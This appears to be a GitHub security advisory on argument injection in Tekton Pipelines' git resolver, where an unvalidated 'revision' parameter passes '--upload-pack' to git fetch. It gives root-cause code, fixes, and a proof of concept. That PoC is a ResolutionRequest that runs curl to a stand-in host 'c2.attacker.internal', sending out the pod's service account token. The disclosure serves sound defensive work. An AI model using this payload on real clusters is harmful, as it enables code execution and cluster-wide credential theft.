- "details": "## Summary\n\nThe git resolver's `revision` parameter is passed directly as a positional argument to `git fetch` without any validation that it does not begin with a `-` character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary `git fetch` flags such as `--upload-pack=<binary>`. Combined with the `validateRepoURL` function explicitly permitting URLs that begin with `/` (local filesystem paths), a tenant who can submit `ResolutionRequest` objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The `tekton-pipelines-resolvers` ServiceAccount holds cluster-wide `get/list/watch` on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.\n\n## Details\n\n### Root Cause 1 — Unvalidated `revision` parameter passed to `git fetch`\n\n`pkg/resolution/resolver/git/repository.go:85`:\n\n```go\n// pkg/resolution/resolver/git/repository.go lines 84-96\n// 'revision' is the raw user-supplied string from the ResolutionRequest param.\n// It is passed verbatim as a positional argument to git fetch:\nfunc (repo *repository) checkout(ctx context.Context, revision string) error {\n _, err := repo.execGit(ctx, \"fetch\", \"origin\", revision, \"--depth=1\")\n // When revision == \"--upload-pack=/usr/bin/curl\", git parses it as the\n // --upload-pack flag, not as a refspec — executing the binary locally.\n if err != nil {\n return fmt.Errorf(\"fetch: %w\", err)\n }\n _, err = repo.execGit(ctx, \"checkout\", \"FETCH_HEAD\")\n return err\n}\n```\n\n`execGit` invokes `exec.CommandContext(\"git\", ...)` — no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When `revision = \"--upload-pack=/path/to/binary\"`, git receives this as the flag `--upload-pack=/path/to/binary`, not as a refspec. `PopulateDefaultParams` (`resolver.go:418–424`) applies only a leading-slash strip and a `containsDotDot` check on the `pathInRepo` parameter; the `revision` parameter receives no validation at all.\n\n### Root Cause 2 — `validateRepoURL` explicitly permits local filesystem paths\n\n`pkg/resolution/resolver/git/resolver.go:154-158`:\n\n```go\n// validateRepoURL validates if the given URL is a valid git, http, https URL or\n// starting with a / (a local repository).\nfunc validateRepoURL(url string) bool {\n pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nAny URL beginning with `/` passes validation and is used directly as the argument to `git clone`. This means a local filesystem path such as `/tmp/some-repo` is a valid resolver URL.\n\n### Exploit Chain\n\n`--upload-pack=<binary>` causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (`/path`), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via `exec.Command` as a single `--upload-pack=<binary>` string (not split by a shell), only binaries at known paths can be invoked — but several useful binaries exist in the resolver pod image (e.g., `/bin/sh`, `/usr/bin/curl`, `/bin/cp`).\n\nAttack complexity is High because the exploit requires either:\n- A valid git repository at a known, predicable path on the resolver pod (e.g., `/tmp/<reponame>-<suffix>` from a concurrent resolution), or\n- A default-URL configuration pointing at a local path\n\n## PoC\n\n```bash\n# Step 1: Set up a local git repository to serve as the \"origin\"\n# (in a real attack, the attacker would time this against a concurrent clone\n# or use any pre-existing git repo path on the resolver pod)\ngit init /tmp/localrepo && cd /tmp/localrepo && git commit --allow-empty -m \"init\"\n\n# Step 2: Craft a ResolutionRequest with injected --upload-pack flag\nkubectl create -f - <<'EOF'\napiVersion: resolution.tekton.dev/v1beta1\nkind: ResolutionRequest\nmetadata:\n name: revision-injection-poc\n namespace: default\n labels:\n resolution.tekton.dev/type: git\nspec:\n params:\n - name: url\n value: /tmp/localrepo\n - name: revision\n value: \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)\"\n - name: pathInRepo\n value: README.md\nEOF\n\n# The resolver pod executes:\n# git -C <tmpdir> fetch origin \\\n# \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/...\" \\\n# --depth=1\n#\n# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):\n# git -C <tmpdir> fetch origin \"--upload-pack=/bin/sh\" --depth=1\n# Executes /bin/sh with the local repository path as argv[1].\n# From /bin/sh, the attacker can use a pre-staged script (e.g., written\n# via a workspace volume) to achieve arbitrary command execution.\n```\n\n**Verified**: `git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1` executes `test-exec.sh` on the local machine even when `origin` is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.\n\n## Impact\n\n- **Code execution on the resolver pod** when an attacker can stage or predict a valid git repository path in `/tmp` on the resolver pod.\n- **Full cluster-wide Secret exfiltration**: The `tekton-pipelines-resolvers` ServiceAccount is bound to a ClusterRole that grants `get/list/watch` on all Secrets in all namespaces (`config/resolvers/200-clusterrole.yaml`). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster.\n- **Privilege escalation**: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens — reading them enables lateral movement to cloud infrastructure.\n- Both the deprecated resolver (`pkg/resolution/resolver/git/`) and the current resolver (`pkg/remoteresolution/resolver/git/`) share the same `validateRepoURL`, `PopulateDefaultParams`, and `checkout` implementation via the shared `git` package. Both are affected.\n\n## Recommended Fix\n\n**Fix 1 — Validate that `revision` does not begin with `-`** in `PopulateDefaultParams`:\n\n```go\nif strings.HasPrefix(paramsMap[RevisionParam], \"-\") {\n return nil, fmt.Errorf(\"invalid revision %q: must not begin with '-'\", paramsMap[RevisionParam])\n}\n```\n\n**Fix 2 — Restrict `validateRepoURL` to remote URLs only** (remove local-path support in production builds, or add an explicit admin opt-in feature flag):\n\n```go\nfunc validateRepoURL(url string) bool {\n pattern := `^([^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nApplying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which `--upload-pack` runs locally) and reduces attack surface further.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments